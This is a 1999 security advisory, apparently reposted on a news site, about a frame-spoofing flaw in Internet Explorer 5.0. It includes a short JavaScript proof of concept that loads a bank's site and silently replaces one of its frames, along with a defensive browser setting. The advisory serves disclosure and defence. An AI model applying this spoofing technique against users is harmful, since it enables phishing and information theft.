Skip navigation
Menu
Security

IE 5.0 Subject to Frame Spoofing - 29 Nov 1999

 
IE 5 Subject to Frame Spoofing
Reported November 30, 1999 by Georgi Guninski
VERSIONS AFFECTED
  • Internet Explorer 5.0

DESCRIPTION

Internet Explorer 5.0 under Windows 95 (guess other versions are affected) with its default security settings allows frame spoofing. The problem is setting the location of a frame to an arbitrary URL without updating the address bar.

This vulnerability allows misleading the user he is browsing a trusted site, while in fact he may be browsing a hostile site which might be stealing information.


DEMONSTRATION

<SCRIPT>
b=window.open("http://www.citybank.com");
function g()
\{
b.frames\[2\].location="http://www.yahoo.com";
\}
setTimeout("g()",6000);
</SCRIPT>

A live demonstration is available at http://www.nat.bg/~joro/msfrspoof.html

DEFENSE

Adjust the security settings of IE. In particular, set the "Navigate sub-frames across different domains" security option (under Tools, Internet Options, Security) to Disable

VENDOR RESPONSE

Microsoft is aware of this matter but has issued no response to date.

CREDITS
Discovered by Georgi Guninski
Hide comments

More information about text formats

Comments

  • Allowed HTML tags: <em> <strong> <blockquote> <br> <p>

Plain text

  • No HTML tags allowed.
  • Web page addresses and e-mail addresses turn into links automatically.
  • Lines and paragraphs break automatically.
Publish
Recommended Reading
Businesswoman challenges concept and gender obstacles
Women in Cybersecurity Face Barriers to Hiring, Advancement
Apr 15, 2024
person typing on keyboard with icons for certificates
Top IT Certifications for a Career in Finance
Apr 12, 2024
employee working on a laptop with AI
Why AI Coding Assistants May Be Greatest Cybersecurity Threat Facing Your Business
Mar 26, 2024
cleaning products
6 Essential Steps for Spring Cleaning Your Website
Mar 21, 2024